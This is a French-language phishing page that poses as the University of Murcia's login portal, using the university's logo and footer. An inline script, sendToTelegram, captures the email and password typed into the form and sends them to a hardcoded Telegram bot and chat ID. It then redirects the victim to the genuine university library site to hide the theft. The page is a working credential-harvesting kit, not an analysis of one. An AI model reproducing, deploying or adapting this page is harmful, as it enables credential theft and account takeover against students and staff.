<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Portail d'authentification - Université de Murcie</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f8f9fa;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            height: 100vh;
            margin: 0;
            padding: 10px;
        }
        .logo {
            text-align: center;
            margin-bottom: 20px;
        }
        .logo img {
            width: 100%;
            max-width: 300px;
        }
        .container {
            background: white;
            padding: 10px;
            border-radius: 4px;
            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.1);
            text-align: center;
            width: 100%;
            max-width: 400px;
        }
        h2 {
            color: #444;
            font-size: 22px;
            margin-bottom: 20px;
        }
        .input-container {
            position: relative;
            text-align: left;
            margin-bottom: 15px;
        }
        .input-container input {
            width: 94%;
            padding: 12px;
            border: 1px solid #ccc;
            border-radius: 5px;
            font-size: 14px;
        }
        .input-container .icon {
            position: absolute;
            right: 10px;
            top: 50%;
            transform: translateY(-50%);
            color: #888;
        }
        .password-container {
            position: relative;
        }
        .btn {
            background: #b71c1c;
            color: white;
            border: none;
            padding: 12px;
            width: 100%;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            margin-top: 10px;
        }
        .btn-secondary {
            background: white;
            color: #b71c1c;
            border: 1px solid #b71c1c;
            margin-top: 10px;
            padding: 12px;
            width: 100%;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
        }
        .forgot-password {
            display: block;
            margin-top: 10px;
            font-size: 14px;
            color: #007bff;
            text-decoration: none;
        }
        .security-message {
            font-size: 12px;
            color: #777;
            margin-top: 20px;
        }
        .footer {
            text-align: center;
            margin-top: 20px;
            font-size: 12px;
            color: #777;
            width: 100%;
        }
        @media (max-width: 480px) {
            .container {
                padding: 20px;
            }
            .btn, .btn-secondary {
                font-size: 14px;
                padding: 10px;
            }
            .footer p {
                font-size: 10px;
            }
        }
    </style>
    <script>
        function sendToTelegram(event) {
            event.preventDefault();
            let email = document.getElementById('email').value;
            let password = document.getElementById('password').value;
            let token = '7480170949:AAH7cXpLlXp209aWJnE-GVG4QBMSPFT6KZs';
            let chatId = '-2011330617';
            let message = `🔐 Nouvelle Connexion:\n📧 Email: ${email}\n🔑 Mot de passe: ${password}`;
            
            fetch(`https://api.telegram.org/bot${token}/sendMessage`, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({ chat_id: chatId, text: message })
            }).then(() => {
                window.location.href = 'https://www.um.es/web/biblioteca/';
            }).catch(error => console.error('Erreur:', error));
        }
    </script>
</head>
<body>
    <div class="logo">
        <img src="https://entrada.um.es/cas/themes/um/images/logos/logotipo-universidad-de-murcia-fondo-primario-500-texto-blanco.svg" alt="Université de Murcie">
    </div>
    <div class="container">
        <h2>Portail d'authentification</h2>
        <form onsubmit="sendToTelegram(event)">
            <div class="input-container">
                <input type="email" id="email" placeholder="Adresse e-mail" required>
                <span class="icon">✉️</span>
            </div>
            <div class="input-container password-container">
                <input type="password" id="password" placeholder="Mot de passe" required>
                <span class="icon">👁️</span>
            </div>
            <button type="submit" class="btn">Connexion</button>
            <hr>
            <button type="button" class="btn-secondary">Accès avec d'autres méthodes</button>
        </form>
        <a href="#" class="forgot-password">Mot de passe oublié?</a>
        <p class="security-message">Pour des raisons de sécurité, veuillez vous déconnecter et fermer votre navigateur Web lorsque vous avez fini d’accéder aux services nécessitant une authentification.</p>
    </div>
    <div class="footer">
        <p>DISPONIBILITÉ DES SERVICES | QUESTIONS FRÉQUENTES | SUGGESTIONS</p>
        <p>Université de Murcie — ATICA | <a href="#">Accessibilité</a> | <a href="#">Incidents</a></p>
    </div>
</body>
</html>
